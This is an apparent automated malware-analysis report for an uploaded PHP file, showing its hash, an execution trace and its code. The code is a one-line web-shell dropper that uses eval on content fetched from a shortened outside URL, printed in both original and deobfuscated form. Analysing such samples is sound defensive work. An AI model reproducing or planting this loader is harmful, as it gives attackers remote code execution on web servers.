PHP Malware Analysis

4054.pHp

md5: c8e6d9f764f2a05988c431f0f686a004

Jump to:

Screenshot


Attributes

Execution

Files

URLs


Deobfuscated PHP code

<?php

echo eval("?>" . file_get_contents("http://bit.ly/cokoxoxo"));
?>


Execution traces

data/traces/c8e6d9f764f2a05988c431f0f686a004_trace-1676258934.7205.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:29:20.618301]
1	0	1	0.000165	393512
1	3	0	0.000211	393592	{main}	1		/var/www/html/uploads/4054.pHp	0	0
2	4	0	0.000227	393592	file_get_contents	0		/var/www/html/uploads/4054.pHp	1	1	'http://bit.ly/cokoxoxo'
2	4	1	0.174360	397456
2	4	R			FALSE
2	5	0	0.174401	397816	eval	1	'?>'	/var/www/html/uploads/4054.pHp	1	0
2	5	1	0.174416	397816
2	5	R			NULL
1	3	1	0.174431	397528
			0.174467	317968
TRACE END   [2023-02-13 01:29:20.792636]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=eval("?>".file_get_contents("http://bit.ly/cokoxoxo"));?>